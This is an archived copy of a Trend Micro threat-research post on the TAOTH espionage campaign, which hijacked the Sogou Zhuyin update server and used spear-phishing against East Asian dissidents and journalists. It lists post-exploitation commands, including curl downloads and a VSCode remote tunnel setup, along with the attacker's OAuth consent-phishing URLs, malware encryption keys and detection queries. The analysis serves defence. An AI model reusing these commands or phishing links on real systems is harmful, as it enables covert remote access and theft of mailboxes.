{
	"id": "cbc58afa-52ef-4bb1-b800-5a9d1743afe7",
	"created_at": "2026-04-06T00:22:03.554526Z",
	"updated_at": "2026-04-10T03:20:59.122736Z",
	"deleted_at": null,
	"sha1_hash": "538ad2302d4482df77017d7e238edf804a25085e",
	"title": "TAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2125007,
	"plain_text": "TAOTH Campaign Exploits End-of-Support Software to Target\r\nTraditional Chinese Users and Dissidents\r\nBy By: Nick Dai, Pierre Lee Aug 28, 2025 Read time: 10 min (2596 words)\r\nPublished: 2025-08-28 · Archived: 2026-04-05 20:22:27 UTC\r\nAPT \u0026 Targeted Attacks\r\nThe TAOTH campaign exploited abandoned software and spear-phishing to deploy multiple malware families, targeting\r\ndissidents and other high-value individuals across Eastern Asia.\r\n \r\nKey takeaways\r\nThe TAOTH campaign leveraged an abandoned Sogou Zhuyin IME update server and spear-phishing operations to\r\ndeliver multiple malware families—including TOSHIS, C6DOOR, DESFY, and GTELAM—primarily targeting\r\nusers across Eastern Asia.\r\nAttackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or login\r\npages, to distribute malware and collect sensitive information.\r\nThe campaign’s victimology and decoy documents reveal a focus on high-value targets, including dissidents,\r\njournalists, researchers, and technology/business leaders in China, Taiwan, Hong Kong, Japan, South Korea, and\r\noverseas Taiwanese communities.\r\nInfrastructure and tool analysis link TAOTH to previously documented threat activity, showing shared C\u0026C\r\ninfrastructure, malware variants, and tactics indicative of a single, persistent attacker group with a focus on\r\nreconnaissance, espionage, and email abuse.\r\nTrend Vision One™ detects and blocks the indicators of compromise (IOCs) outlined in this blog, and provides\r\ncustomers with tailored hunting queries, threat insights, and intelligence updates. \r\nIntroduction\r\nIn June, we identified and investigated an unusual security incident involving the installation of two malware families,\r\nC6DOOR and GTELAM, on a victim’s host. Our investigation determined that the malware was delivered through a\r\nlegitimate input method editor (IME) software, Sogou Zhuyin. As brief explanation, an IME is a tool that interprets\r\nsequences of keystrokes into complex characters for languages not suited to a standard QWERTY keyboard (like many East\r\nAsian languages).\r\nThe software had stopped receiving updates in 2019; in October 2024 attackers took over the lapsed domain name and used\r\nit to distribute malicious payloads. Telemetry data indicates that at least several hundred victims were affected, with\r\ninfections leading to additional post-exploitation activities.\r\nThrough infrastructure tracking, we observed that the same threat actor is also targeting high-value individuals primarily\r\nlocated in Eastern Asia. In this article, in addition to the attacks abusing Sogou Zhuyin, we will also examine a related spear-phishing campaign targeting Japan, Korea, China, and Taiwan.\r\nOperation 1: Sogou Zhuyin\r\nSogou Zhuyin is an IME software developed by a Chinese technology company named Sogou. It provides 2 IME software\r\nfor different phonetic systems: Sogou Pinyin and Sogou Zhuyin (also known as Bopomofo, which is the main phonetic\r\nsystem for Chinese Mandarin in Taiwan). Sogou Zhuyin was originally released for users in Taiwan, but has not been\r\nmaintained since 2019.\r\nOur analysis shows that the attacker took over the abandoned update server and, after registering it, used the domain to host\r\nmalicious updates since October 2024. Through this channel, multiple malware families have been deployed, including\r\nGTELAM, C6DOOR, DESFY, and TOSHIS.\r\nInfection chain\r\nAccording to an archived version of its Wikipedia page, the Sogou Zhuyin service was terminated and discontinued in June\r\n2019. However, starting in October 2024, the attacker hijacked the abandoned official update domain (sogouzhuyin[.]com)\r\nand, by 2025, was distributing the official installer through it. With the update server under attacker control, the Sogou\r\nZhuyin application began delivering malicious updates since November 2024.\r\nBased on our telemetry, the threat actor deployed four distinct malware families in this operation: TOSHIS, DESFY,\r\nGTELAM, and C6DOOR. The deployed malware families serve different purposes, including remote access (RAT),\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 1 of 11\n\ninformation theft, and backdoor functionality. To evade detection, the threat actors also leveraged third-party cloud services\r\nto conceal their network activities across the attack chain.\r\nThe full infection chain is as follows:\r\nFigure 1. The infection chain for the first operation\r\nFirst, the victims download the official installer from the Internet. For example, we found that someone modified the\r\nTraditional Chinese Wikipedia page for Sogou Zhuyin in March 2025 and added the formerly legitimate but now-malicious\r\ndomain dl[.]sogouzhuyin[.]com on it.\r\nFigure 2. The modified Wikipedia page for Sogou Zhuyin\r\nOur analysis confirms that the downloaded installer is the official, unmodified version. However, a few hours after\r\ninstallation, the automatic update process is triggered. The updater, ZhuyinUp.exe, then attempts to retrieve an update\r\nconfiguration file from the following embedded URL:\r\nhttps[:]//srv-pc[.]sogouzhuyin[.]com/v1/upgrade/version\r\nFigure 3. The embedded update URL that ZhuyinUp.exe connects to\r\nThe update configuration file contains the URL and MD5 hash for the update installer. Once the update installer is\r\ndownloaded and the MD5 hash check is passed, the installer will then be executed.\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 2 of 11\n\nFigure 4. The downloaded update configuration file\r\nBased on our analysis, there were at least four malware families delivered through the update, including DESFY, GTELAM,\r\nC6DOOR and TOSHIS. So far, we have observed the attacker deploying malware such as DESFY and GTELAM to profile\r\nvictims and identify high-value targets.\r\nVictimology\r\nSince Sogou Zhuyin targets users who understand Zhuyin, most of the victims are based in Taiwan. However, the impact\r\nextends beyond the region—Taiwanese communities oversea have also been affected, resulting in a globally distributed\r\npopulation of Taiwanese targets.\r\nFigure 5. Victimology distribution\r\nMalware analysis\r\nAccording to our analysis, 4 malwares were observed and dropped in the victim environments, including TOSHIS, DESFY,\r\nGTELAM and C6DOOR.\r\nTOSHIS\r\nThe TOSHIS malware functions primarily as a loader and has been observed in this operation dating back to December of\r\nlast year. It is identified as a variant of the Xiangoop malware family. TOSHIS acts as a stager by retrieving additional\r\npayloads from its command-and-control (C\u0026C) server.\r\nIts infection mechanism involves patching the entry point of a legitimate Portable Executable (PE) file to execute malicious\r\nshellcode. This modification allows the malware to download and run further shellcode payloads from external sources.\r\nTrend Micro telemetry has identified several instances of modified binaries associated with this threat, including:\r\nSunloginDesktopAgent.exe\r\nSearchIndexer.exe\r\nProcmon.exe\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 3 of 11\n\nThe shellcode injected at the entry point uses Adler-32 to resolve API hashes. Subsequently, it maps the C\u0026C data onto the\r\nstack, as demonstrated below:\r\nFigure 6. The C\u0026C configuration in the stack\r\nTOSHIS only targets victims with the following language ID:\r\n0x404: zh-TW\r\n0x804: zh-CN\r\n0x411: ja-JP\r\nFigure 7. The system language check routine\r\nIn all analyzed samples, the key for decrypting the final payload was consistently “qazxswedcvfrtgbn”. This key is the same\r\nas the one used in the payload downloaded from the old Xiangoop samples.\r\nFigure 8. The key used in the payload downloaded from the old Xiangoop sample.\r\nBased on our analysis, the final payload will be either of the following malware:\r\nCOBEACON (Cobalt Strike)\r\nMerlin agent for Mythic framework\r\nDESFY\r\nThe DESFY tool is a spyware that first emerged in May 2025, and acts as an information collector. It gathers filenames from\r\nthe following locations:\r\nDesktop\r\nProgram Files\r\nOnce the filenames are collected, DESFY transmits this data to the C\u0026C server via the HTTP POST method. This\r\nfunctionality is likely used for profiling victims to determine suitable targets.\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 4 of 11\n\nFigure 9. DESFY collects the file names from Desktop and Program Files\r\nGTELAM\r\nGTELAM is another spyware tool, first identified in this May, that also targets victims for information theft. Instead of\r\ncollecting filenames from specific folders, it collects filenames with the following extensions:\r\n.pdf\r\n.doc\r\n.docx\r\n.xls\r\n.xlsx\r\n.ppt\r\n.pptx\r\nAll collected filenames are encrypted in AES and sent to Google Drive. This suggests that this tool is designed for\r\ninformation theft to identify and prioritize high-value targets.\r\nFigure 10. GTELAM collects document names\r\nC6DOOR\r\nC6DOOR is a custom backdoor written in Golang that supports both HTTP and WebSocket. Notably, the presence of\r\nembedded Simplified Chinese characters within the sample suggests that the threat actor may be Chinese-speaking.\r\nFigure 11. C6DOOR supports HTTP and WebSocket protocols\r\nIt supports the following commands:\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 5 of 11\n\nCommand Description\r\nInformationCli Retrieve victim information, including IP, OS, Username, hostname\r\nExecuteCommandSleep Set the interval time of backdoor commands\r\nExecuteCommandHandler Execute arbitrary OS commands\r\nExecuteCommandSsh Execute commands via SSH\r\nExecuteSendDirList List directory content\r\nExecuteSendDir Send directory information\r\nExecuteEcho Run “echo” command\r\nExecuteCat Display file content\r\nExecuteMkdir Create directories\r\nExecuteCopy Copy files\r\nExecuteCommandScan Network port scan\r\nDownloadHandler Download files from C\u0026C server\r\nDownloadfileserver Upload files to the C\u0026C server\r\nExecuteCommandSftp Transfer file through SFTP\r\nExecScreenshot Capture screenshots\r\nGetAllProcessNames List running processes\r\nExecuteshellcode\r\nInject shellcode (existing file) into the target process. This is decrypted in AES.\r\nKey: fee8211f723b5bfeb74cc45b0eac7fcd275397ea8f538cf5ea138f12586e5b26\r\nIV: 6679580b03a7e9284f26c5936c8655fa\r\nExecutePwd Print working directory\r\nTable 1. The commands in C6DOOR\r\nPost-exploitation routines\r\nIt appears that the attacker was still in the reconnaissance phase, primarily seeking high-value targets. As a result, no further\r\npost-exploitation activities were observed in the majority of victim systems. In one of the cases we analyzed, the attacker\r\nwas inspecting the victim’s environment and establishing a tunnel using Visual Studio Code (VSCode).\r\nThe commands used in the post-exploitation stages:\r\nC:\\Windows\\System32\\tasklist.exe /svc\r\nC:\\Windows\\System32\\quser.exe\r\nC:\\Windows\\System32\\ipconfig.exe /all\r\nC:\\Windows\\System32\\net.exe time /domain\r\nC:\\Windows\\System32\\net.exe user\r\nC:\\Windows\\System32\\curl.exe cip.cc\r\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe /c echo %localappdata%\r\nC:\\Windows\\System32\\cmd.exe /c dir %localappdata%\\microsoft\r\nC:\\Windows\\System32\\cmd.exe /c dir %localappdata%\\Microsoft\\Office\r\nC:\\Windows\\System32\\cmd.exe /c curl -kOJL \"https://code.visualstudio.com/sha/download?build=stable\u0026os=cli-win32-\r\nx64\" \u0026 dir\r\nC:\\Windows\\System32\\cmd.exe /c tar -zxvf vscode_cli_win32_x64_cli.zip \u0026 dir .\r\nC:\\Windows\\System32\\cmd.exe /c del /f /q vscode_cli_win32_x64_cli.zip \u0026 dir .\r\nC:\\Windows\\System32\\cmd.exe /c code.exe tunnel user login --provider github \u003e z.txt \u0026 type z.txt\r\nC:\\Windows\\System32\\cmd.exe /c code.exe tunnel service install\r\nC:\\Windows\\System32\\HOSTNAME.EXE\r\nOperation 2: Spear-phishing\r\nUpon further investigation into the Sogou Zhuyin operation, we identified that one instance of the TOSHIS malware was\r\ndistributed through a phishing website. Our analysis indicates that the same threat actor is orchestrating another spear-https://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 6 of 11\n\nphishing campaign targeting Eastern Asia.\r\nTrend telemetry revealed the use of two types of phishing techniques:\r\nFake login pages that redirect and grant OAuth consent to attacker-controlled apps\r\nFake cloud storage pages that download of the TOSHIS malware\r\nAdditionally, we discovered that a series of politically-related topics decoy documents, suggesting that the threat actors are\r\ntargeting journalists and dissidents in Eastern Asia.\r\nVictimology\r\nThe targeted victims are mainly located in Eastern Asia, including China, Hong Kong, Taiwan, Japan, and South Korea. A\r\nsmall portion of victims were identified in the United States and Norway.\r\nFigure 12. Victimology distribution\r\nInfection chain\r\nFor the infection routine, the attacker first sends spear-phishing emails to targeted victims. These emails include either a\r\nphishing URL or a decoy document designed to entice the recipient to respond or interact with the malicious content. The\r\nattacker’s aim is to achieve either of the following:\r\nManipulate victim systems via the TOSHIS malware.\r\nGain unauthorized access and control over the victim’s Google or Microsoft mailboxes by obtaining OAuth consent.\r\nFigure 13. The infection chain for the second operation\r\nDecoy Documents\r\nAnalysis of the decoy documents suggests that the attacker is likely targeting the following groups:\r\nResearchers\r\nDissidents\r\nJournalists\r\nChief officers in the technology or business sectors\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 7 of 11\n\nFigure 14. Decoy document soliciting cooperation with the targeted journalist for a non-disclosure initiative\r\naimed at gathering and curating trending public topics\r\nFigure 15. Decoy document asking for a paper from the targeted researcher\r\nAttack path 1: Fake cloud storage page\r\nThe fraudulent page is designed to mimic a legitimate cloud storage service. Upon accessing the site, victims are\r\nautomatically prompted to download an archive file named material.zip.\r\nFigure 16. The fake cloud storage page\r\nThe following image shows the files archived in the material.zip file.\r\nFigure 17. The downloaded archive material.zip\r\nIn this case, the PDF file provided to the victim is intentionally corrupted, prompting the individual to click on a counterfeit\r\nPDF reader executable named PDFreader.exe., which is a legitimate McOds.exe binary. After the victim opens the fake PDF\r\nreader, the malicious module McVsoCfg.dll will be launched via DLL sideloading. Further analysis reveals that\r\nMcVsoCfg.dll is a loader for the TOSHIS malware. It downloads another decoy document along with malicious shellcode.\r\nUltimately, the final payload delivered through this infection chain is a Merlin Agent.\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 8 of 11\n\nAttack path 2: Fake login page\r\nThe fraudulent pages are themed around various enticing topics, such as free birthday gifts, free coupons, or fake PDF\r\nreaders. When victims interact with one of the login buttons, they are initially redirected to an obfuscated intermediary page,\r\nthen subsequently forwarded to a legitimate Google or Microsoft login portal.\r\nFigure 18. Fraudulent birthday page\r\nFigure 19. The login buttons shown in the birthday page\r\nThe destination is the legitimate OAuth consent site. We observed the following OAuth URLs prompting users to grant\r\nconsent to the attacker-controlled application.\r\nhttps[:]//accounts[.]google[.]com/o/oauth2/auth?response_type=code\u0026client_id=715259374054-\r\nmst41mfku1h8l7ga5vbtrv8cm48h9nde.apps.googleusercontent.com\u0026redirect_uri=https%3A%2F%2Fwww.auth-web.com%2Fgm-oauth2-\r\ncallback\u0026scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fgmail.modify\u0026state=LWbfFETatSc8EB9zpunfqcf54VsVaR\u0026access_type=\r\nhttps[:]//login[.]microsoftonline[.]com/common/oauth2/v2.0/authorize?\r\nscope=offline_access+contacts.read+user.read+mail.read+mail.send\u0026redirect_uri=https%3A%2F%2Fauth.onedrive365-\r\njp.com%2Fgetauthtoken\u0026response_type=code\u0026client_id=e707daa3-579f-4bae-bb7d-89a73d52ffa1\r\nAs indicated by the URLs, the OAuth applications request scopes for email manipulation, such as gmail.modify and\r\nmail.read+mail.send. This suggests that the attacker aims to exploit compromised email accounts to further target the\r\nvictim’s contacts or connections, potentially facilitating lateral phishing or data exfiltration activities.\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 9 of 11\n\nFigure 20. The OAuth consent page\r\nThe obfuscated intermediary page works as a web beacon. It sends a request to a Chinese message pushing service\r\n(sctapi[.]ftqq[.]comI) for beaconing. The page is obfuscated by a public service obfuscator.io. Below is an example of the\r\nsite after deobfuscation.\r\nFigure 21. The deobfuscated page\r\nAttribution\r\nOur investigation reveals that the TAOTH campaign, along with the threat activities from Case 1 and 4 documented in\r\nITOCHU's research, can be attributed to the same threat actor group as supported by the following evidence:\r\nShared C\u0026C infrastructures: Analysis identified overlapping C\u0026C infrastructure between TAOTH and ITOCHU’s\r\ncases, particularly 45[.]32[.]117[.]177.\r\nShared tools: The TOSHIS malware is a variant of Xiangoop. Furthermore, the Cobalt Strike beacon detected in\r\nboth investigations shares the same C\u0026C address and watermark (520).\r\nSimilar Tactics, Techniques, and Procedures (TTPS): The threat actor employs consistent methods, such as\r\nestablishing VSCode tunnels and launching supply chain attacks via legitimate applications, including YouDao and\r\nSogou.\r\nConsistent targeted regions: China, Taiwan and Hong Kong.\r\nConclusion\r\nThis article examines the TAOTH campaign and offers insights into how the attacker leverages an end-of-support\r\napplication to deploy malware through software updates and spear-phishing operation.\r\nIn the Sogou Zhuyin operation, the threat actor maintained a low profile, conducting reconnaissance to identify valuable\r\ntargets among victims. To facilitate this, spyware such as DESFY and GTELAM were used for information theft. Notably,\r\nGTELAM conceals its data exfiltration by abusing Google Drive as a transfer mechanism. Meanwhile, in the ongoing spear-phishing operations, the attacker distributed malicious emails to the targets for further exploitation.\r\nTo proactively defend against similar attacks, enterprises should routinely audit their environments for any end-of-support\r\nsoftware and promptly remove or replace such applications.  Additionally, users are advised to verify the file extensions of\r\nall downloads from the internet and carefully review the permissions requested by cloud applications before granting access.\r\nProactive security with Trend Vision One™\r\nTrend Vision One️™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure\r\nmanagement, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent\r\nthreats, accelerating proactive security outcomes across their respective digital estate. With Trend Vision One, you’re\r\nenabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for\r\ninnovation.\r\nTrend Vision One ™ Threat Intelligence\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 10 of 11\n\nTo stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights which provides the latest\r\ninsights from Trend™ Research on emerging threats and threat actors.  \r\nTrend Vision One Threat Insights \r\nTAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents\r\nTrend Vision One Intelligence Reports (IOC Sweeping) '\r\nTAOTH Campaign Exploits End-of-Support Software and Phishing to Target Dissidents and Journalists in East Asia\r\nHunting Queries \r\nTrend Vision One Search App \r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post\r\nwith data in their environment. \r\nVSAPI Detection\r\neventName:MALWARE_DETECTION AND malName:(*TOSHIS* OR *C6DOOR* OR *GTELAM* OR *DESFY*)\r\nNetwork – domain\r\neventSubId:602 AND (objectHostName: \"practicalpublishing.s3.dualstack.us-east-1.amazonaws.com\" OR objectHostName:\r\n\"www.auth-web.com\" OR objectHostName: \"auth.onedrive365-jp.com\")\r\nNetwork – IP\r\neventId:3 AND ( src:\"45.32.117.177\" OR src:\"64.176.50.181\" OR src:\"154.90.62.210\" OR src:\"38.60.203.134\" OR\r\nsrc:\"192.124.176.51\" OR dst:\"45.32.117.177\" OR dst:\"64.176.50.181\" OR dst:\"154.90.62.210\" OR dst:\"38.60.203.134\" OR\r\ndst:\"192.124.176.51\")\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here. \r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nhttps://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/h/taoth-campaign.html"
	],
	"report_names": [
		"taoth-campaign.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434923,
	"ts_updated_at": 1775791259,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/538ad2302d4482df77017d7e238edf804a25085e.pdf",
		"text": "https://archive.orkl.eu/538ad2302d4482df77017d7e238edf804a25085e.txt",
		"img": "https://archive.orkl.eu/538ad2302d4482df77017d7e238edf804a25085e.jpg"
	}
}